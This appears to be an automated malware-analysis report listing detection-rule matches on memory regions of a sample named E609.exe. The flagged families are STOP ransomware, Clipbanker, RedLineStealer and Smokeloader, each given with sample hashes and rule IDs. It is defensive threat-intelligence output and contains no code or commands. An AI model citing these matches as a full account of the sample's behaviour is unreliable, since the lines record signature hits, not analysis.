Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
